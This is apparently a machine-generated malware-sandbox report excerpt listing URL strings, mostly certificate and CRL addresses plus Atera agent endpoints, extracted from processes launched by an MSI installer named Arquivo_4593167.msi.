                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/37.9/AGENTPACKAGEAGENTINFORMATI
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEMONITORING/37.8/AGENTPACKAGEMONITORING.ZIP
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/23.4/AGENTPACKAGESTREMOTE.ZIP
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a6dc35606b2c6816e.awsglobalaccelerator.com
                                Source: AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acontrol.atera.com/
                                Source: rundll32.exe, 00000004.00000002.1732615847.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62D0F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CFA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://agent-api.atera.com
                                Source: rundll32.exe, 00000004.00000002.1732615847.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62D0F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://atera-agent-api-eu.westeurope.cloudapp.azure.com
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.dr, Microsoft.Extensions.FileSystemGlobbing.dll.24.dr, System.Runtime.InteropServices.dll.24.dr, System.Text.Encodings.Web.dll0.24.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6E0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD21EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA204000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2A2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt4.0.
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1956064131.000001BE7B4B8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E4D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2203027448.000002E967DA9000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084912382.0000022D4CAAB000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000002.2087026675.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2085700686.0000022D4CADE000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000001F.00000003.2084621827.0000022D4CAA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                                Source: xdnup.dll.1.dr, stdpms.cat.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA298000.00000004.00000020.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.dr, System.Diagnostics.Process.dll.24.dr, Microsoft.Extensions.FileSystemGlobbing.dll.24.dr, System.Runtime.InteropServices.dll.24.dr, System.Text.Encodings.Web.dll0.24.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                                Source: AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000C.00000002.1793099468.000001C5E5C8F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1283000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA055000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C1A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA31E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA29C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976797117.0000016BEA38A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD2254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlhttp://crl4.digicert.co
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9BF8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2976304470.0000016BEA309000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2978322929.0000016BEA6F6000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A139000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0B9000.00000004.00000800.00020000.00000000.sdmp, PreVerCheck.exe, 00000025.00000002.2562182711.0000000000BF5000.00000002.00000001.01000000.0000001C.sdmp, Arquivo_4593167.msi, SRUsb.exe.1.dr, Microsoft.Win32.TaskScheduler.dll0.24.dr, System.Runtime.Serialization.Json.dll.24.dr, libssl-3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E591E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: LiteDB.dll.24.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E591E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlb
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/l
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crlrlCache
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com:80/DigiCertTrustedRootG4.crl%
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/
                                Source: rundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msiString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
